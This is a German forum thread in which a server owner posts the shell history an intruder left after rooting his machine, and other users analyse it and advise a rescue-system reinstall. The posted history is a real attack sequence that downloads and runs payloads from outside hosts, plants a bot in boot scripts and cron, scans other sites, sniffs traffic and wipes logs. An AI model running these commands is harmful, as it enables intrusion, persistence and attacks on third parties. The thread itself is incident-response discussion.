Das macht keinen Unterschied. 700 heißt nur root kann sie ausführen, und der kann die Zugriffrechte sowieso immer ändern.Konni wrote:Für den Fall, dass ich mich jetzt lächerlich mache, aber ich bin so paranoid, und mach die "gefährlichen" Befehle immer auf 000, dann kann sie keiner ausführen, und wenn ich mal brauch kann man ja kurzzeitig umändern.øxygen wrote: Naja hättest du die Ratschläge hier im Forum befolgt wäre das nicht passiert. (/tmp, /var noexec,nosuid mounten, wget, w3m, lynx, gcc etc chmod 700 setzten oder ganz entfernen)
Server wurde gehackt *_*
Re: Server wurde gehackt *_*
meins ist auch gehackt
hier ist .bash_history
ganze index geändert
wo ist er rein gekommen und was hat er alles installiert ?
			
			
									
						
										
						Code: Select all
rm ps.htm
cd /home/www
ls
ls -al
cd /etc
ls nam*
cat named.conf |grep zone
locate httpd.conf
cat /etc/httpd/httpd.conf |grep ServerName 
cd /var/tmp/...
wget http://www.btnx.com/ht.ocx
chmod 7777 *
./ht.ocx /
cd /etc/rc.d/init.d
cd /etc/init.d
wget www.pocketpctools.com/brkt
chmod 7777 brkt
mv brkt netfsd
cp netfsd /sbin/lnx86
chmod 7777 /sbin/lnx86
cd ..
cd rc.d
cat rc.local
ls
cat boot.local
echo /etc/init.d/netfsd >> boot.local
chmod 7777 /etc.init.d/netfsd
chmod 7777 /etc/init.d/netfsd
cd /var/spool
ls
cd cron
ls
cat root
echo "0 0 7 7 * /sbin/lnx86 " >> root
cd /var/tmp
ls
ls -al
cd ...
ls
rm *
wget www.pocketpctools.com/mass.sh
chmod 7777 *
./mass.sh /
pwd
wget www.pocketpctools.com/str.tgz
wget www.pocketpctools.com/str.tar.gz
tar zxvf str*
cd strobe
ls
mv strobe s
wget 200.177.162.127/lista.txt
wget 200.177.162.127/lista.txt
./s
rm lista.txt
wget 200.177.162.127/lista.txt
./s
./s -v -V -s -o lll -t 5 -n 1000 -S strobe.services -i lista.txt -f
who
finger ircd
rm brk
who
cd /root/
ls
./bin
cd bin
ls
wget http://ka0tic.topcities.com/xpl/toy.tgz
tar -zxvf toy.tgz;rm toy.tgz;cd toy;./setup 123qwe 60922
cd ..
rm -rf toy
rm ps.htm
mkdir .p
cd .p
wget 200.177.162.127/amap.tar.gz
tar zxvf amap*
cd amap-4.5
lls
ls
./configure
make
ls
./amap
./amap -A -bHdvq -o logzz www.terra.com.br
./amap -A -bHdvq -o logzz www.terra.coom.br 80
./amap -A -bHdvq -o logzz www.canalmarilia.com.br 80
./amap -A -bHdvq -o logzz 200.210.235.147 80
wget http://www.thc.org/download.php?t=r&f=thcrut-1.2.5.tar.gz
a
wget 200.177.162.127/thcrut.tar.gz
tar zxvf thcrut.t*
cd thcrut-1.2.5
ls
./configure
make all install; thcrut -h
wget 200.177.162.127/probe.tar.gz
tar zxvf probe*
cd probe-4.1
ls
./probe
./probe www.canalmarilia.com.br
./probe www.mac0nha.com
./probe -p www.canalmarilia.com.br
q
q
./probe www.uol.com.br
./probe -p www.uol.com.br
rm -rf *
wget 200.177.162.127/uht1.tgz
tar zxvf uht1*
ls -al
tar zxvf Col*
cd Collector-1.0
ls
cat README
ls
ls -al
cd Server
ls -al
make
ls
./collector
cd ..
ls
cat TODO
cd ..
ls
tar zxvf Hun*
cd Hunter-1.2
ls
make
ls
cat README
wget 200.177.162.127/snif.tar.gz
tar zxvf snif*
cd sniffit.0.3.5
ls -al
./configure
make
ls
./sniffit -h
cp sniffit /home/www/web6/html/sniffit
./sniffit
mkdir ...
cd ...
wget 200.177.162.127/sn.tar.gz
tar zxvf sn.t*
cd sniffit.0.3.7.beta
ls
sh install-sh
./install-sh
./configure
make
ls
rm /home/www/web6/html/sniffit
cp sniffit /home/www/web6/html/sniffit
./sniffit
./sniffit -v
ifconfig
./sniffit
./sniffit -P TCP -r /tmp/.snl -F eth0
uname -a
./sniffit -t 217.160.92.159 -R /tmp/.snl -P TCP 
rm ps.htm
./sniffit -t 217.160.92.159 -R /tmp/.snl -P TCP &
ls -al .snl
ls -al .snl
rm -rf .snl
ls -al .snl
ls -al .snl
./sniffit -t 217.160.92.159 -R /tmp/.snl -P TCP
ls -al .snl
./sniffit -t 217.160.92.159 -R /tmp/.snl
./sniffit -t 217.160.92.159 -R /tmp/.sn
./sniffit -t 217.160.92.159 -R /tmp/.sn -F eth0
ls -al .sn*
./sniffit -t 217.160.92.159 -R /tmp/.snl -P TCP &
ls -al .sn*
pwd
./sniffit -t 217.160.92.159 -R /tmp/.snl -P TCP
ps x
kill -9 6114
ps x
 PROMPT_COMMAND='pwd>&7;kill -STOP $$'wo ist er rein gekommen und was hat er alles installiert ?
Re: Server wurde gehackt *_*
Keine Ahnung, das kann man daran nicht sehen.
1. Wer sagt dir, dass der Angreifer nicht extra die .bash_history modifiziert hat, um Spuren von anderen Sachen zu verwischen, die er noch auf dem System gemacht hat
2. Alle Befehle in dieser Datei wurden - wenn man einmal davon ausginge, dass die .bash_history wirklich das beschreibt, was der Angreifer gemacht hat - erst nach dem Eindringen ausgeführt, lassen also keine Rückschlüsse über den Weg dorthin zu.
3. Fahr den Server zuerst ins Rettungssystem, überleg dir dann ob du Anzeige erstatten willst, aber boote nicht mehr ins normale System. Danach solltest du den Server neu initialisieren lassen oder selber neu installieren.
			
			
									
						
										
						1. Wer sagt dir, dass der Angreifer nicht extra die .bash_history modifiziert hat, um Spuren von anderen Sachen zu verwischen, die er noch auf dem System gemacht hat
2. Alle Befehle in dieser Datei wurden - wenn man einmal davon ausginge, dass die .bash_history wirklich das beschreibt, was der Angreifer gemacht hat - erst nach dem Eindringen ausgeführt, lassen also keine Rückschlüsse über den Weg dorthin zu.
3. Fahr den Server zuerst ins Rettungssystem, überleg dir dann ob du Anzeige erstatten willst, aber boote nicht mehr ins normale System. Danach solltest du den Server neu initialisieren lassen oder selber neu installieren.
Re: Server wurde gehackt *_*
danke dir, mit anzeige wird es nichts, lasse den server lieber neu installieren.
			
			
									
						
										
						- 
				captaincrunch
- Userprojekt 
- Posts: 7066
- Joined: 2002-10-09 14:30
- Location: Dorsten
- Contact:
Re: Server wurde gehackt *_*
Gut kombiniert, Watson:1. Wer sagt dir, dass der Angreifer nicht extra die .bash_history modifiziert hat, um Spuren von anderen Sachen zu verwischen, die er noch auf dem System gemacht hat
Code: Select all
[chris@shadow kiddie]$ head -8 ht.ocx
#coded By kieger
clear
if [ "$1" != "" ]
then
echo "Disable and Clean bash_history Command LOG"
echo "" > /root/.bash_history
echo "bash_history Command LOG is Disabled and Cleaned"
echo ""
...damit die Kiste danach sofort wieder zur einfachen Beute wird?danke dir, mit anzeige wird es nichts, lasse den server lieber neu installieren.
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
			
						echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
Re: Server wurde gehackt *_*
@CaptainCrunch, auch nach dem neu installation oder wie ?...damit die Kiste danach sofort wieder zur einfachen Beute wird?
Re: Server wurde gehackt *_*
Ach ja - und schau dir mal noch kurz das an, DEMO: http://zone-h.org/en/defacements/filter ... 60.92.159/
			
			
									
						
										
						- 
				captaincrunch
- Userprojekt 
- Posts: 7066
- Joined: 2002-10-09 14:30
- Location: Dorsten
- Contact:
Re: Server wurde gehackt *_*
Ja, denn anscheinennd hat das Kiddie keine Probleme gehabt, deine Kiste (wodurch auch immer) zu rooten.
Btw.: Kleine Analyse der runtergeladenen Tools:
1. brkt
Verbindet sich ins IRC, kann Files downloaden, DOSsen und ein paar andere Kleinigkeiten.
2. ht.ocx:
"Reinigt" die .bash_history, grabbelt den Servernamen aus der httpd.conf
3. mass.sh:
Kleines Mass-Defacement-Script, das u.U. auch noch weitere Hintertüren ins System einbaut
4. amap:
Relativ einfacher Scanner
In Kurzform: deine Kiste ist eine Gefahr für sämtliche andere Netzteilnehmer.
			
			
									
						
							Btw.: Kleine Analyse der runtergeladenen Tools:
1. brkt
Verbindet sich ins IRC, kann Files downloaden, DOSsen und ein paar andere Kleinigkeiten.
2. ht.ocx:
"Reinigt" die .bash_history, grabbelt den Servernamen aus der httpd.conf
3. mass.sh:
Kleines Mass-Defacement-Script, das u.U. auch noch weitere Hintertüren ins System einbaut
4. amap:
5. strobe:Amap is a next-generation scanning tool, which identifies applications and services even if they are not listening on the default port by creating a bogus-communication and analyzing the responses.
Relativ einfacher Scanner
In Kurzform: deine Kiste ist eine Gefahr für sämtliche andere Netzteilnehmer.
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
			
						echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
Re: Server wurde gehackt *_*
Das Ganze sieht mir noch nicht sehr nach Rescuesystem aus. Worauf wartest du noch? Bist du dir dessen bewusst, welchen Wert dein Rootserver auch als Waffe haben kann?
			
			
									
						
										
						- 
				captaincrunch
- Userprojekt 
- Posts: 7066
- Joined: 2002-10-09 14:30
- Location: Dorsten
- Contact:
Re: Server wurde gehackt *_*
1. Komplettes ACK zu wirsings letztem Satz.
2.
			
			
									
						
							2.
Die Frage, wodurch du gerootet wurdest ist jetzt nicht dein Ernst, oder?2.4.21-lufs-030704
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
			
						echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
Re: Server wurde gehackt *_*
habe ihn jetzt runter gefahren, ich hatte heute mittag einen auf irc opper access gegeben mit vollem irc root zugriff rechte, aber kann er mit dem sich per schell einloggen?
			
			
									
						
										
						Re: Server wurde gehackt *_*
http://www.google.de/search?sourceid=na ... s%2D030704
was genau ist den das Captain ?
war der Kernel Version schuld
			
			
									
						
										
						was genau ist den das Captain ?
war der Kernel Version schuld
- 
				captaincrunch
- Userprojekt 
- Posts: 7066
- Joined: 2002-10-09 14:30
- Location: Dorsten
- Contact:
Re: Server wurde gehackt *_*
Ist die Frage dein Ernst? Die Antwort findest du zuhauf hier im Forum.
			
			
									
						
							DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
			
						echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
- 
				captaincrunch
- Userprojekt 
- Posts: 7066
- Joined: 2002-10-09 14:30
- Location: Dorsten
- Contact:
Re: Server wurde gehackt *_*
Da dur des Rätsels Lösung ja wirklich nicht zu kennen scheinst: der von dir eingesetzte Kernel enthält mehrere Sicherheitslücken, durch die (immerhin) lokale User root-Rechte erhalten können, was wohl auch hier mit ziemlicher Sicherheit der Fall war.
Die Frage, wie derjenige auf's System kam, lässt sich ohne weitere Kenntnis deines Systems nicht beantworten, aber ich rate einfach mal: PHPNuke!?!
Wie auch immer: alleine die Tatsache, dass du anscheinend nicht durch die Security-Mailingliste(n) deines Distributors aufgeschreckt worden bist zeigt eigentlich, dass du grob fahrlässig gehandelt hast.
			
			
									
						
							Die Frage, wie derjenige auf's System kam, lässt sich ohne weitere Kenntnis deines Systems nicht beantworten, aber ich rate einfach mal: PHPNuke!?!
Wie auch immer: alleine die Tatsache, dass du anscheinend nicht durch die Security-Mailingliste(n) deines Distributors aufgeschreckt worden bist zeigt eigentlich, dass du grob fahrlässig gehandelt hast.
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
			
						echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
Re: Server wurde gehackt *_*
Capitain hast recht, habe mich nicht so für die sicherheit gekümmert, und wie ich denke war phpbb die haupt tüer,
ist bei suse 9.0 der kernel jetzt sicherer ?
			
			
									
						
										
						ist bei suse 9.0 der kernel jetzt sicherer ?
- 
				captaincrunch
- Userprojekt 
- Posts: 7066
- Joined: 2002-10-09 14:30
- Location: Dorsten
- Contact:
Re: Server wurde gehackt *_*
Ein ein gefixter Kernel deiner alten Version hätte bereits gereicht.ist bei suse 9.0 der kernel jetzt sicherer ?
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
			
						echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
Re: Server wurde gehackt *_*
PHPBB ?? Wie alt waren denn die Foren ??DEMO wrote:Capitain hast recht, habe mich nicht so für die sicherheit gekümmert, und wie ich denke war phpbb die haupt tüer,
ist bei suse 9.0 der kernel jetzt sicherer ?
Gruß Outi
- 
				captaincrunch
- Userprojekt 
- Posts: 7066
- Joined: 2002-10-09 14:30
- Location: Dorsten
- Contact:
Re: Server wurde gehackt *_*
phpbb kann ich mir spontan auch nicht vorstellen, da seit geraumer Zeit da zwar Lücken aufgetaucht sind, diese aber normalerweise einem Angreifer keine Shell geliefert hätten.
Na ja, wie gesagt: man kann nur vermuten. Wenn du sämtliche Updates so gehandhabt hast, gibt's da diverse Möglichkeiten, wie derjenige rankam.
			
			
									
						
							Na ja, wie gesagt: man kann nur vermuten. Wenn du sämtliche Updates so gehandhabt hast, gibt's da diverse Möglichkeiten, wie derjenige rankam.
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
			
						echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
Re: Server wurde gehackt *_*
die phpbb version war wie hier im forum, da hatte mich schon jemand gewarnt wegen der sicherheitslücke in phpbb mit dem mann root pass auslesen kann, deshalb sollte ein patch drauf machen aber war zu spät.
			
			
									
						
										
						- 
				captaincrunch
- Userprojekt 
- Posts: 7066
- Joined: 2002-10-09 14:30
- Location: Dorsten
- Contact:
Re: Server wurde gehackt *_*
Das "root pass" hat im Allgemeinen nichts mit dem Admin-Passwort des phpbb zu tun; auch wir hier waren Opfer eines solchen Angriffs, das ganze betraf aber ausschließlich das phpbb, derjenige kam totzdem nicht annähernd ans darunterliegende System.da hatte mich schon jemand gewarnt wegen der sicherheitslücke in phpbb mit dem mann root pass auslesen kann, deshalb sollte ein patch drauf machen aber war zu spät.
Sofern man natürlich so dämlich ist (sorry, aber anders lässt sich das dann nicht mehr sagen), die gleichen Passwörter dafür einzusetzen ist man wirklich selbst Schuld.
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
			
						echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc
Re: Server wurde gehackt *_*
bringt aber auch nichts, da phpbb das passwort md5hasht, also man dann wieder bruteforce bräuchte!